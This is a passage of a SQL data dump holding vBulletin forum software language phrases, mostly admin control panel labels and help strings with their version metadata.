(Ensure that you have access masks enabled before attempting to use these!)', 'vbulletin', '', 0, ''), (32926, -1, 'home_page', 'cpglobal', 'Home Page', 'vbulletin', '', 0, ''), (32927, -1, 'host_name', 'cpglobal', 'Host Name', 'vbulletin', '', 0, ''), (32928, -1, 'hour', 'cpglobal', 'Hour', 'vbulletin', '', 0, ''), (32929, -1, 'html_content_type', 'cpglobal', 'HTML Content Type', 'vbulletin', '', 0, ''), (32930, -1, 'icon', 'cpglobal', 'Icon', 'vbulletin', 'vBulletin Solutions', 1190988616, '3.7.0 Beta 1'), (32931, -1, 'icon_bookmarksite_help', 'cpglobal', 'Filename for Icon. This must be placed in your misc image directory (default: images/misc).', 'vbulletin', 'vBulletin Solutions', 1190989024, '3.7.0 Beta 1'), (32932, -1, 'if_you_are_not_automatically_redirected_click_here_x', 'cpglobal', 'If you are not automatically redirected, please click here.', 'vbulletin', '', 0, ''), (32933, -1, 'if_you_change_display_order', 'cpglobal', 'If you change the display orders, please be sure to submit the form using the \'Save Display Order\' button at the bottom of the page', 'vbulletin', '', 0, ''), (32934, -1, 'image', 'cpglobal', 'Image', 'vbulletin', '', 0, ''), (32935, -1, 'import', 'cpglobal', 'Import', 'vbulletin', '', 0, ''), (32936, -1, 'import_xml_file', 'cpglobal', 'OR import the XML file from your server', 'vbulletin', '', 0, ''), (32937, -1, 'invalid_action_specified', 'cpglobal', 'Invalid Action Specified', 'vbulletin', 'vBulletin Solutions', 1204725447, '3.7.0 Beta 6'), (32938, -1, 'invalid_forum_parenting', 'cpglobal', 'Invalid forum parenting setup. Contact vBulletin support.', 'vbulletin', '', 0, ''), (32939, -1, 'language', 'cpglobal', 'Language', 'vbulletin', '', 0, ''), (32940, -1, 'large_edit_box', 'cpglobal', 'Large Edit Box', 'vbulletin', '', 0, ''), (32941, -1, 'link', 'cpglobal', 'Link', 'vbulletin', 'vBulletin Solutions', 1190988678, '3.7.0 Beta 1'), (32942, -1, 'link_replacement_variables_help', 'cpglobal', 'Replacement variables: {URL} is the given page url, {TITLE} is the given page title.', 'vbulletin', 'vBulletin Solutions', 1190988696, '3.7.0 Beta 1'), (32943, -1, 'logged_in_user_x_executed_y_queries', 'cpglobal', 'Logged-in user: {1}; Executed {2} queries.', 'vbulletin', '', 0, ''), (32944, -1, 'logs', 'cpglobal', 'Logs', 'vbulletin', '', 0, ''), (32945, -1, 'maintenance', 'cpglobal', 'Maintenance', 'vbulletin', '', 0, ''), (32946, -1, 'mass_move', 'cpglobal', 'Mass Move', 'vbulletin', '', 0, ''), (32947, -1, 'max_length_of_allowed_user_input', 'cpglobal', 'Max length of allowed user input', 'vbulletin', '', 0, ''), (32948, -1, 'maximum_chars_x', 'cpglobal', 'Maximum Chars: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32949, -1, 'minimum_posts', 'cpglobal', 'Minimum Posts', 'vbulletin', '', 0, ''), (32950, -1, 'minute', 'cpglobal', 'Minute', 'vbulletin', '', 0, ''), (32951, -1, 'moderation', 'cpglobal', 'Moderation', 'vbulletin', '', 0, ''), (32952, -1, 'moderator_log', 'cpglobal', 'Moderator Log', 'vbulletin', '', 0, ''), (32953, -1, 'moderator_username', 'cpglobal', 'Moderator Username', 'vbulletin', '', 0, ''), (32954, -1, 'moderator_usernames', 'cpglobal', 'Moderator Usernames', 'vbulletin', 'vBulletin Solutions', 1191255776, '3.7.0 Beta 1'), (32955, -1, 'modify', 'cpglobal', 'Modify', 'vbulletin', '', 0, ''), (32956, -1, 'move', 'cpglobal', 'Move', 'vbulletin', '', 0, ''), (32957, -1, 'no_file_uploaded_and_no_local_file_found', 'cpglobal', 'No file uploaded and no local file found. {1}', 'vbulletin', '', 0, ''), (32958, -1, 'no_one', 'cpglobal', 'No one', 'vbulletin', '', 0, ''), (32959, -1, 'no_posting', 'cpglobal', 'No Posting', 'vbulletin', '', 0, ''), (32960, -1, 'notices_manager', 'cpglobal', 'Notices Manager', 'vbulletin', 'vBulletin Solutions', 1189770839, '3.6.8'), (32961, -1, 'order_by', 'cpglobal', 'Order By', 'vbulletin', '', 0, ''), (32962, -1, 'order_by_date', 'cpglobal', 'Order By Date', 'vbulletin', '', 0, ''), (32963, -1, 'order_by_username', 'cpglobal', 'Order By User Name', 'vbulletin', '', 0, ''), (32964, -1, 'page', 'cpglobal', 'Page', 'vbulletin', '', 0, ''), (32965, -1, 'parent_forum', 'cpglobal', 'Parent Forum', 'vbulletin', '', 0, ''), (32966, -1, 'parent_style', 'cpglobal', 'Parent Style', 'vbulletin', '', 0, ''), (32967, -1, 'permanent', 'cpglobal', 'Permanent', 'vbulletin', '', 0, ''), (32968, -1, 'phrase_type', 'cpglobal', 'Phrase Type', 'vbulletin', '', 0, ''), (32969, -1, 'phrases', 'cpglobal', 'Phrases', 'vbulletin', '', 0, ''), (32970, -1, 'please_wait', 'cpglobal', 'Please Wait...', 'vbulletin', '', 0, ''), (32971, -1, 'primary_usergroup', 'cpglobal', 'Primary Usergroup', 'vbulletin', '', 0, ''), (32972, -1, 'processing_complete_proceed', 'cpglobal', 'Processing Complete - Proceed', 'vbulletin', '', 0, ''), (32973, -1, 'processing_x', 'cpglobal', 'Processing: {1}', 'vbulletin', '', 0, ''), (32974, -1, 'product', 'cpglobal', 'Product', 'vbulletin', '', 0, ''), (32975, -1, 'promotions', 'cpglobal', 'Promotions', 'vbulletin', '', 0, ''), (32976, -1, 'prune', 'cpglobal', 'Prune', 'vbulletin', '', 0, ''), (32977, -1, 'prune_post_edit_history', 'cpglobal', 'Prune Post Edit History', 'vbulletin', '', 0, ''), (32978, -1, 'question', 'cpglobal', 'Question', 'vbulletin', '', 0, ''), (32979, -1, 'quick_search', 'cpglobal', 'Quick Search', 'vbulletin', '', 0, ''), (32980, -1, 'rebuild_style_information', 'cpglobal', 'Rebuild Style Information', 'vbulletin', '', 0, ''), (32981, -1, 'reminder', 'cpglobal', 'Reminder', 'vbulletin', '', 0, ''), (32982, -1, 'repeat_process', 'cpglobal', 'Repeat Process', 'vbulletin', '', 0, ''), (32983, -1, 'replace_with_text', 'cpglobal', 'Replace with Text', 'vbulletin', '', 0, ''), (32984, -1, 'reputation_level', 'cpglobal', 'Reputation Level', 'vbulletin', '', 0, ''), (32985, -1, 'restart', 'cpglobal', 'Restart', 'vbulletin', '', 0, ''), (32986, -1, 'results', 'cpglobal', 'Results', 'vbulletin', '', 0, ''), (32987, -1, 'revert', 'cpglobal', 'Revert', 'vbulletin', '', 0, ''), (32988, -1, 'rss_feed_manager', 'cpglobal', 'RSS Feed Manager', 'vbulletin', 'vBulletin Solutions', 1149264761, '3.6.0 Beta 1'), (32989, -1, 'save_display_order', 'cpglobal', 'Save Display Order', 'vbulletin', '', 0, ''), (32990, -1, 'save_enabled_status', 'cpglobal', 'Save Enabled Status', 'vbulletin', 'vBulletin Solutions', 1149075896, '3.6.0 Beta 1'), (32991, -1, 'save_open_groups_automatically', 'cpglobal', 'Save open groups automatically', 'vbulletin', '', 0, ''), (32992, -1, 'save_prefs', 'cpglobal', 'Save Prefs', 'vbulletin', '', 0, ''), (32993, -1, 'scheduled_task_log', 'cpglobal', 'Scheduled Task Log', 'vbulletin', '', 0, ''), (32994, -1, 'script', 'cpglobal', 'Script', 'vbulletin', '', 0, ''), (32995, -1, 'search_for_text', 'cpglobal', 'Search for Text', 'vbulletin', '', 0, ''), (32996, -1, 'search_in_x', 'cpglobal', 'Search in {1}', 'vbulletin', '', 0, ''), (32997, -1, 'search_type', 'cpglobal', 'Search Type', 'vbulletin', '', 0, ''), (32998, -1, 'select_forum', 'cpglobal', 'Select Forum', 'vbulletin', '', 0, ''), (32999, -1, 'separate_usernames_semicolon', 'cpglobal', 'Separate multiple usernames with a \';\'', 'vbulletin', 'vBulletin Solutions', 1194362908, '3.7.0 Beta 1'), (33000, -1, 'set_default', 'cpglobal', 'Set Default', 'vbulletin', '', 0, ''), (33001, -1, 'setting_group', 'cpglobal', 'Setting Group', 'vbulletin', '', 0, ''), (33002, -1, 'settings_to_edit', 'cpglobal', 'Settings to Edit Select the settings type you want to edit and click the \"Edit Settings\" button.', 'vbulletin', '', 0, ''), (33003, -1, 'social_bookmarking_manager', 'cpglobal', 'Social Bookmarking Manager', 'vbulletin', 'vBulletin Solutions', 1190988714, '3.7.0 Beta 1'), (33004, -1, 'standard_using_default_usergroup_permissions', 'cpglobal', 'Standard: Using default usergroup permissions', 'vbulletin', '', 0, ''), (33005, -1, 'statistics', 'cpglobal', 'Statistics', 'vbulletin', '', 0, ''), (33006, -1, 'status', 'cpglobal', 'Status', 'vbulletin', '', 0, ''), (33007, -1, 'style', 'cpglobal', 'Style', 'vbulletin', '', 0, ''), (33008, -1, 'styles', 'cpglobal', 'Styles', 'vbulletin', '', 0, ''), (33009, -1, 'stylevar', 'cpglobal', 'Stylevar', 'vbulletin', '', 0, ''), (33010, -1, 'stylevars', 'cpglobal', 'StyleVars', 'vbulletin', '', 0, ''), (33011, -1, 'table', 'cpglobal', 'Table', 'vbulletin', '', 0, ''), (33012, -1, 'templates', 'cpglobal', 'Templates', 'vbulletin', '', 0, ''), (33013, -1, 'text', 'cpglobal', 'Text', 'vbulletin', '', 0, ''), (33014, -1, 'thumbnail', 'cpglobal', 'Thumbnail', 'vbulletin', '', 0, ''), (33015, -1, 'to_continue_this_action', 'cpglobal', 'To continue this action, login using the admin account that initiated the action.', 'vbulletin', 'vBulletin Solutions', 1157730820, '3.6.1'), (33016, -1, 'toggle_active_status_for_all', 'cpglobal', 'Toggle Active Status for All', 'vbulletin', 'vBulletin Solutions', 1190886666, '3.7.0 Beta 1'), (33017, -1, 'translations', 'cpglobal', 'Translations', 'vbulletin', '', 0, ''), (33018, -1, 'unknown_error', 'cpglobal', 'Unknown Error', 'vbulletin', '', 0, ''), (33019, -1, 'update', 'cpglobal', 'Update', 'vbulletin', '', 0, ''), (33020, -1, 'updated_x_styles', 'cpglobal', 'Updated {1} style(s)', 'vbulletin', '', 0, ''), (33021, -1, 'upload_xml_file', 'cpglobal', 'EITHER upload the XML file from your computer', 'vbulletin', '', 0, ''), (33022, -1, 'user_profile_field', 'cpglobal', 'User Profile Field', 'vbulletin', '', 0, ''), (33023, -1, 'user_profile_fields', 'cpglobal', 'User Profile Fields', 'vbulletin', '', 0, ''), (33024, -1, 'user_rank', 'cpglobal', 'User Rank', 'vbulletin', '', 0, ''), (33025, -1, 'usergroup_options', 'cpglobal', 'Usergroup Options', 'vbulletin', '', 0, ''), (33026, -1, 'users', 'cpglobal', 'Users', 'vbulletin', '', 0, ''), (33027, -1, 'utf8encode_title', 'cpglobal', 'UTF8 Encode {TITLE}', 'vbulletin', 'vBulletin Solutions', 1266999728, '3.8.5'), (33028, -1, 'utf8encode_title_help', 'cpglobal', 'Some sites (such as twitter.com) require URL to be encoded. Set \"Yes\" if this is required.', 'vbulletin', 'vBulletin Solutions', 1266813988, '3.8.5'), (33029, -1, 'varname', 'cpglobal', 'Varname', 'vbulletin', '', 0, ''), (33030, -1, 'vbulletin_default', 'cpglobal', 'vBulletin Default (Will be replaced by upgrade scripts)', 'vbulletin', '', 0, ''), (33031, -1, 'vbulletin_options', 'cpglobal', 'vBulletin Options', 'vbulletin', '', 0, ''), (33032, -1, 'view_reputation_comments', 'cpglobal', 'View Reputation Comments', 'vbulletin', '', 0, ''), (33033, -1, 'who_voted', 'cpglobal', 'Who Voted', 'vbulletin', '', 0, ''), (33034, -1, 'x_enter_the_options_that_the_user_can_choose_from', 'cpglobal', '{1}Enter the options that the user can choose from. Separate each option with a new-line (carriage return).', 'vbulletin', '', 0, ''), (33035, -1, 'x_from_the_calendar_y', 'cpglobal', '{1} from the calendar {2}', 'vbulletin', 'vBulletin Solutions', 1201000591, '3.7.0 Beta 5'), (33036, -1, 'x_from_the_forum_y', 'cpglobal', '{1} from the forum {2}', 'vbulletin', 'vBulletin Solutions', 1201000537, '3.7.0 Beta 5'), (33037, -1, 'x_to_y', 'cpglobal', '{1} to {2}', 'vbulletin', '', 0, ''), (33038, -1, 'x_translation', 'cpglobal', '{1} Translation', 'vbulletin', '', 0, ''), (33039, -1, 'x_y_id_z', 'cpglobal', '{1}: {2} (id: {3})', 'vbulletin', '', 0, ''), (33040, -1, 'you_did_not_specify_a_file_to_upload', 'cpglobal', 'You did not specify a file to upload, so vBulletin will attempt to import the file\\n\\n{1}\\n\\nfrom the server\'s file system.\\n\\nAre you sure?', 'vbulletin', '', 0, ''), (33041, -1, 'zero_equals_no_display', 'cpglobal', 'Set to \'0\' to not display this item', 'vbulletin', '', 0, ''), (33042, -1, 'add_new_automatic_ban', 'cphome', 'Add New Automatic Ban', 'vbulletin', 'vBulletin Solutions', 1157730753, '3.6.1'), (33043, -1, 'add_new_avatars', 'cphome', 'Add New Avatars', 'vbulletin', '', 0, ''), (33044, -1, 'add_new_bb_code', 'cphome', 'Add New BB Code', 'vbulletin', '', 0, ''), (33045, -1, 'add_new_calendar', 'cphome', 'Add New Calendar', 'vbulletin', '', 0, ''), (33046, -1, 'add_new_faq_item', 'cphome', 'Add New FAQ Item', 'vbulletin', '', 0, ''), (33047, -1, 'add_new_forum', 'cphome', 'Add New Forum', 'vbulletin', '', 0, ''), (33048, -1, 'add_new_plugin', 'cphome', 'Add New Plugin', 'vbulletin', '', 0, ''), (33049, -1, 'add_new_post_icon', 'cphome', 'Add New Post Icon', 'vbulletin', '', 0, ''), (33050, -1, 'add_new_prefix_set', 'cphome', 'Add New Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190044326, '3.7.0 Beta 1'), (33051, -1, 'add_new_scheduled_task', 'cphome', 'Add New Scheduled Task', 'vbulletin', '', 0, ''), (33052, -1, 'add_new_smilie', 'cphome', 'Add New Smilie', 'vbulletin', '', 0, ''), (33053, -1, 'add_new_social_group_category', 'cphome', 'Add New Social Group Category', 'vbulletin', 'vBulletin Solutions', 1215700714, '3.8.0 Alpha 1'), (33054, -1, 'add_new_subscription', 'cphome', 'Add New Subscription', 'vbulletin', '', 0, ''), (33055, -1, 'add_new_user', 'cphome', 'Add New User', 'vbulletin', '', 0, ''), (33056, -1, 'add_new_user_infraction_group', 'cphome', 'Add New User Infraction Group', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33057, -1, 'add_new_user_infraction_level', 'cphome', 'Add New User Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33058, -1, 'add_new_user_profile_field', 'cphome', 'Add New User Profile Field', 'vbulletin', '', 0, ''), (33059, -1, 'add_new_user_rank', 'cphome', 'Add New User Rank', 'vbulletin', '', 0, ''), (33060, -1, 'add_new_user_reputation', 'cphome', 'Add New User Reputation', 'vbulletin', '', 0, ''), (33061, -1, 'add_new_user_title', 'cphome', 'Add New User Title', 'vbulletin', '', 0, ''), (33062, -1, 'add_new_usergroup', 'cphome', 'Add New Usergroup', 'vbulletin', '', 0, ''), (33063, -1, 'add_paymentapi', 'cphome', 'Add New Payment API', 'vbulletin', '', 0, ''), (33064, -1, 'address', 'cphome', 'Address', 'vbulletin', 'vBulletin Solutions', 1150120073, '3.6.0 Beta 2'), (33065, -1, 'admin_attention_required', 'cphome', 'Administrator Attention Required', 'vbulletin', 'vBulletin Solutions', 1150120087, '3.6.0 Beta 2'), (33066, -1, 'admin_help_manager', 'cphome', 'Admin Help Manager', 'vbulletin', '', 0, ''), (33067, -1, 'administrator_notes', 'cphome', 'Administrator Notes', 'vbulletin', '', 0, ''), (33068, -1, 'advertising', 'cphome', 'Advertising', 'vbulletin', 'vBulletin Solutions', 1228479530, '3.8.0 Beta 4'), (33069, -1, 'album_picture_storage_type', 'cphome', 'Album Picture Storage Type', 'vbulletin', 'vBulletin Solutions', 1192541633, '3.7.0 Beta 1'), (33070, -1, 'apc_too_old', 'cphome', 'Your server is running a version of the Alternative PHP Cache (APC) that is incompatible with this version of vBulletin. Please upgrade APC to version 3.0.0 or newer.', 'vbulletin', 'vBulletin Solutions', 1201518151, '3.7.0 Beta 5'), (33071, -1, 'attachment_manager', 'cphome', 'Attachment Manager', 'vbulletin', 'vBulletin Solutions', 1148056467, '3.6.0 Beta 1'), (33072, -1, 'attachment_permissions', 'cphome', 'Attachment Permissions', 'vbulletin', 'vBulletin Solutions', 1148324940, '3.6.0 Beta 1'), (33073, -1, 'attachment_storage_type', 'cphome', 'Attachment Storage Type', 'vbulletin', '', 0, ''), (33074, -1, 'attachment_usage', 'cphome', 'Attachment Usage', 'vbulletin', '', 0, ''), (33075, -1, 'attachments_awaiting_moderation', 'cphome', 'Attachments to Moderate', 'vbulletin', '', 0, ''), (33076, -1, 'avatar_manager', 'cphome', 'Avatar Manager', 'vbulletin', '', 0, ''), (33077, -1, 'ban_user', 'cphome', 'Ban User', 'vbulletin', '', 0, ''), (33078, -1, 'bb_code_manager', 'cphome', 'BB Code Manager', 'vbulletin', '', 0, ''), (33079, -1, 'business_development', 'cphome', 'Business Development', 'vbulletin', '', 0, ''), (33080, -1, 'calendar_manager', 'cphome', 'Calendar Manager', 'vbulletin', '', 0, ''), (33081, -1, 'calendar_permissions', 'cphome', 'Calendar Permissions', 'vbulletin', '', 0, ''), (33082, -1, 'calendars', 'cphome', 'Calendars', 'vbulletin', 'vBulletin Solutions', 1161272137, '3.6.3'), (33083, -1, 'collapse_all', 'cphome', 'Collapse All', 'vbulletin', '', 0, ''), (33084, -1, 'collapse_group', 'cphome', 'Collapse Group', 'vbulletin', '', 0, ''), (33085, -1, 'community_forums', 'cphome', 'Community Forums', 'vbulletin', '', 0, ''), (33086, -1, 'control_panel_home', 'cphome', 'Control Panel Home', 'vbulletin', '', 0, ''), (33087, -1, 'copyright_enforcement_by', 'cphome', 'Copyright Enforcement By', 'vbulletin', '', 0, ''), (33088, -1, 'could_not_open_x', 'cphome', 'Fatal Error Could not open {1}', 'vbulletin', '', 0, ''), (33089, -1, 'currently_x_customized_templates_updated', 'cphome', 'There are currently {1} customized template(s) that need to be updated or reverted. Some sections of vBulletin may not function if you do not do this!
\r\n
\r\nClick here to view these templates!', 'vbulletin', '', 0, ''), (33090, -1, 'custom_avatar_usage', 'cphome', 'Avatar Usage', 'vbulletin', '', 0, ''), (33091, -1, 'custom_bb_codes', 'cphome', 'Custom BB Codes', 'vbulletin', '', 0, ''), (33092, -1, 'custom_profile_picture_usage', 'cphome', 'Profile Picture Usage', 'vbulletin', '', 0, ''), (33093, -1, 'database_data_usage', 'cphome', 'Data Usage', 'vbulletin', '', 0, ''), (33094, -1, 'database_index_usage', 'cphome', 'Index Usage', 'vbulletin', '', 0, ''), (33095, -1, 'dismiss', 'cphome', 'Dismiss', 'vbulletin', 'vBulletin Solutions', 1150120141, '3.6.0 Beta 2'), (33096, -1, 'download_latest_version', 'cphome', 'Download Latest Version', 'vbulletin', '', 0, ''), (33097, -1, 'download_upload_languages', 'cphome', 'Download / Upload Languages', 'vbulletin', '', 0, ''), (33098, -1, 'download_upload_plugins', 'cphome', 'Download / Upload Plugins', 'vbulletin', '', 0, ''), (33099, -1, 'download_upload_styles', 'cphome', 'Download / Upload Styles', 'vbulletin', '', 0, ''), (33100, -1, 'download_vbulletin_x_from_members_area', 'cphome', 'Click here to download vBulletin {1} from the Members\' Area', 'vbulletin', '', 0, ''), (33101, -1, 'due_tasks', 'cphome', 'Due Tasks', 'vbulletin', '', 0, ''), (33102, -1, 'duplicate_permissions', 'cphome', 'Duplicate Permissions', 'vbulletin', 'vBulletin Solutions', 1213891230, '3.8.0 Alpha 1'), (33103, -1, 'eaccelerator_too_old', 'cphome', 'eAccelerator for PHP must be upgraded to 0.9.3 or newer.', 'vbulletin', '', 0, ''), (33104, -1, 'events_awaiting_moderation', 'cphome', 'Events to Moderate', 'vbulletin', '', 0, ''), (33105, -1, 'expand_group', 'cphome', 'Expand Group', 'vbulletin', '', 0, ''), (33106, -1, 'faq_manager', 'cphome', 'FAQ Manager', 'vbulletin', '', 0, ''), (33107, -1, 'file_uploads_disabled', 'cphome', 'FILE_UPLOADS Disabled', 'vbulletin', '', 0, ''), (33108, -1, 'find_updated_phrases', 'cphome', 'Find Updated Phrases', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33109, -1, 'find_updated_templates', 'cphome', 'Find Updated Templates', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33110, -1, 'forum_home_page', 'cphome', 'Forum Home Page', 'vbulletin', '', 0, ''), (33111, -1, 'forum_manager', 'cphome', 'Forum Manager', 'vbulletin', '', 0, ''), (33112, -1, 'forum_permissions', 'cphome', 'Forum Permissions', 'vbulletin', '', 0, ''), (33113, -1, 'forums_and_moderators', 'cphome', 'Forums & Moderators', 'vbulletin', '', 0, ''), (33114, -1, 'google_adsense', 'cphome', 'Google AdSense', 'vbulletin', 'vBulletin Solutions', 1228479560, '3.8.0 Beta 4'), (33115, -1, 'graphics_development', 'cphome', 'Graphics Development', 'vbulletin', '', 0, ''), (33116, -1, 'holiday_manager', 'cphome', 'Holiday Manager', 'vbulletin', '', 0, ''), (33117, -1, 'human_verification', 'cphome', 'Human Verification', 'vbulletin', 'vBulletin Solutions', 1192474912, '3.7.0 Beta 1'), (33118, -1, 'human_verification_manager', 'cphome', 'Human Verification Manager', 'vbulletin', 'vBulletin Solutions', 1192474938, '3.7.0 Beta 1'), (33119, -1, 'language_manager', 'cphome', 'Language Manager', 'vbulletin', '', 0, ''), (33120, -1, 'languages', 'cphome', 'Languages', 'vbulletin', '', 0, ''), (33121, -1, 'languages_and_phrases', 'cphome', 'Languages & Phrases', 'vbulletin', '', 0, ''), (33122, -1, 'latest_version_available_x', 'cphome', 'Latest version available: {1}', 'vbulletin', '', 0, ''), (33123, -1, 'log_manager', 'cphome', 'Log Manager', 'vbulletin', '', 0, ''), (33124, -1, 'manage_products', 'cphome', 'Manage Products', 'vbulletin', '', 0, ''), (33125, -1, 'members_area', 'cphome', 'Members\' Area', 'vbulletin', '', 0, ''), (33126, -1, 'merge_users', 'cphome', 'Merge Users', 'vbulletin', '', 0, ''), (33127, -1, 'messages_awaiting_moderation', 'cphome', 'Messages to Moderate', 'vbulletin', 'vBulletin Solutions', 1191956359, '3.7.0 Beta 1'), (33128, -1, 'mmcache_not_supported', 'cphome', 'Turck MMCache has been made obsolete by eAccelerator and does not function properly with vBulletin.', 'vbulletin', '', 0, ''), (33129, -1, 'moderate_attachments', 'cphome', 'Moderate Attachments', 'vbulletin', '', 0, ''), (33130, -1, 'moderate_events', 'cphome', 'Moderate Events', 'vbulletin', '', 0, ''), (33131, -1, 'moderate_posts', 'cphome', 'Moderate Posts', 'vbulletin', '', 0, ''), (33132, -1, 'moderate_signatures', 'cphome', 'Moderate Signatures', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33133, -1, 'moderate_threads', 'cphome', 'Moderate Threads', 'vbulletin', '', 0, ''), (33134, -1, 'moderate_users', 'cphome', 'Moderate Users', 'vbulletin', '', 0, ''), (33135, -1, 'moderate_visitor_messages', 'cphome', 'Moderate Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1208262824, '3.7.0 Release Candidate 4'), (33136, -1, 'mysql_language_lookup', 'cphome', 'MySQL Language Lookup', 'vbulletin', '', 0, ''), (33137, -1, 'mysql_max_packet_size', 'cphome', 'MySQL Packet Size', 'vbulletin', '', 0, ''), (33138, -1, 'mysql_running_strict_mode', 'cphome', 'MySQL is running in strict mode. While you may proceed, some areas of vBulletin may not function properly. It is strongly recommended that you set $config[\'Database\'][\'force_sql_mode\'] to true in your includes/config.php file!', 'vbulletin', '', 0, ''), (33139, -1, 'mysql_strict_mode_warning', 'cphome', 'MySQL Strict Mode Warning', 'vbulletin', '', 0, ''), (33140, -1, 'mysql_version', 'cphome', 'MySQL Version', 'vbulletin', '', 0, ''), (33141, -1, 'new_posts_today', 'cphome', 'New Posts Today', 'vbulletin', '', 0, ''), (33142, -1, 'new_threads_today', 'cphome', 'New Threads Today', 'vbulletin', '', 0, ''), (33143, -1, 'new_users_today', 'cphome', 'New Users Today', 'vbulletin', '', 0, ''), (33144, -1, 'news_header_string', 'cphome', 'For Your Information', 'vbulletin', 'vBulletin Solutions', 1157465077, '3.6.1'), (33145, -1, 'no_frames_support', 'cphome', 'Your browser does not support frames. Please get one that does!', 'vbulletin', '', 0, ''), (33146, -1, 'other_contributions_from', 'cphome', 'Other Contributions From', 'vbulletin', '', 0, ''), (33147, -1, 'out_of_date_custom_templates_found', 'cphome', 'Out-of-Date Custom Templates Found!', 'vbulletin', '', 0, ''), (33148, -1, 'paymentapi_manager', 'cphome', 'Payment API Manager', 'vbulletin', '', 0, ''), (33149, -1, 'php_function_lookup', 'cphome', 'PHP Function Lookup', 'vbulletin', '', 0, ''), (33150, -1, 'php_max_post_size', 'cphome', 'PHP Max Post Size', 'vbulletin', '', 0, ''), (33151, -1, 'php_max_upload_size', 'cphome', 'PHP Maximum Upload Size', 'vbulletin', '', 0, ''), (33152, -1, 'php_memory_limit', 'cphome', 'PHP Memory Limit', 'vbulletin', '', 0, ''), (33153, -1, 'phrase_manager', 'cphome', 'Phrase Manager', 'vbulletin', '', 0, ''), (33154, -1, 'please_note_deleting_this_item_will_remove_children', 'cphome', 'Please note: deleting this item will also remove any child entries of this item.', 'vbulletin', '', 0, ''), (33155, -1, 'plugin_manager', 'cphome', 'Plugin Manager', 'vbulletin', '', 0, ''), (33156, -1, 'plugins_products', 'cphome', 'Plugins & Products', 'vbulletin', 'vBulletin Solutions', 1161596425, '3.6.3'), (33157, -1, 'post_icon_manager', 'cphome', 'Post Icon Manager', 'vbulletin', '', 0, ''), (33158, -1, 'post_new_announcement', 'cphome', 'Post New Announcement', 'vbulletin', 'vBulletin Solutions', 1142642373, '3.6.0 Beta 1'), (33159, -1, 'posts_awaiting_moderation', 'cphome', 'Posts to Moderate', 'vbulletin', '', 0, ''), (33160, -1, 'private_message_statistics', 'cphome', 'Private Message Statistics', 'vbulletin', '', 0, ''), (33161, -1, 'problematic_php_optimizer_found', 'cphome', 'Problematic PHP Optimizer Found', 'vbulletin', '', 0, ''), (33162, -1, 'product_manager', 'cphome', 'Product Manager', 'vbulletin', '', 0, ''), (33163, -1, 'prune_social_groups', 'cphome', 'Prune Social Groups', 'vbulletin', 'vBulletin Solutions', 1200321595, '3.7.0 Beta 4'), (33164, -1, 'prune_users', 'cphome', 'Prune / Move Users', 'vbulletin', '', 0, ''), (33165, -1, 'quick_administrator_links', 'cphome', 'Quick Administrator Links', 'vbulletin', '', 0, ''), (33166, -1, 'quick_moderator_links', 'cphome', 'Quick Moderator Links', 'vbulletin', '', 0, ''), (33167, -1, 'quick_phrase_finder', 'cphome', 'Quick Phrase Finder', 'vbulletin', 'vBulletin Solutions', 1199205986, '3.7.0 Beta 4'), (33168, -1, 'quick_user_finder', 'cphome', 'Quick User Finder', 'vbulletin', '', 0, ''), (33169, -1, 'rebuild_bitfields', 'cphome', 'Rebuild Bitfields', 'vbulletin', '', 0, ''), (33170, -1, 'rebuild_thumbnails', 'cphome', 'Rebuild Thumbnails', 'vbulletin', 'vBulletin Solutions', 1192541661, '3.7.0 Beta 1'), (33171, -1, 'reference_manual', 'cphome', 'Reference Manual', 'vbulletin', '', 0, ''), (33172, -1, 'referrals', 'cphome', 'Referrals', 'vbulletin', '', 0, ''), (33173, -1, 'repair_optimize_tables', 'cphome', 'Repair / Optimize Tables', 'vbulletin', '', 0, ''), (33174, -1, 'replacement_variable_manager', 'cphome', 'Replacement Variable Manager', 'vbulletin', '', 0, ''), (33175, -1, 'revert_prefs', 'cphome', 'Revert Prefs', 'vbulletin', '', 0, ''), (33176, -1, 'rss_feeds', 'cphome', 'RSS Feeds', 'vbulletin', 'vBulletin Solutions', 1150844131, '3.6.0 Beta 3'), (33177, -1, 'safe_mode', 'cphome', 'Safe Mode', 'vbulletin', '', 0, ''), (33178, -1, 'scheduled_task_manager', 'cphome', 'Scheduled Task Manager', 'vbulletin', '', 0, ''), (33179, -1, 'scheduled_tasks', 'cphome', 'Scheduled Tasks', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33180, -1, 'search_for_users', 'cphome', 'Search for Users', 'vbulletin', '', 0, ''), (33181, -1, 'search_in_phrases', 'cphome', 'Search in Phrases', 'vbulletin', '', 0, ''), (33182, -1, 'search_in_templates', 'cphome', 'Search in Templates', 'vbulletin', '', 0, ''), (33183, -1, 'search_ip_addresses', 'cphome', 'Search IP Addresses', 'vbulletin', '', 0, ''), (33184, -1, 'search_social_groups', 'cphome', 'Search Social Groups', 'vbulletin', 'vBulletin Solutions', 1215700563, '3.8.0 Alpha 1'), (33185, -1, 'search_type', 'cphome', 'Search Type', 'vbulletin', '', 0, ''), (33186, -1, 'send_email_to_users', 'cphome', 'Send Email to Users', 'vbulletin', '', 0, ''), (33187, -1, 'server_load_averages', 'cphome', 'Server Load Averages', 'vbulletin', '', 0, ''), (33188, -1, 'server_type', 'cphome', 'Server Type', 'vbulletin', '', 0, ''), (33189, -1, 'show_all_moderators', 'cphome', 'Show All Moderators', 'vbulletin', '', 0, ''), (33190, -1, 'show_all_news', 'cphome', 'Show All News', 'vbulletin', 'vBulletin Solutions', 1157465113, '3.6.1'), (33191, -1, 'smilie_manager', 'cphome', 'Smilie Manager', 'vbulletin', '', 0, ''), (33192, -1, 'social_group_categories', 'cphome', 'Social Group Categories', 'vbulletin', 'vBulletin Solutions', 1215700592, '3.8.0 Alpha 1'), (33193, -1, 'social_group_icon', 'cphome', 'Social Group Icon', 'vbulletin', 'vBulletin Solutions', 1231772341, '3.8.1'), (33194, -1, 'social_group_icon_storage_type', 'cphome', 'Social Group Icon Storage Type', 'vbulletin', 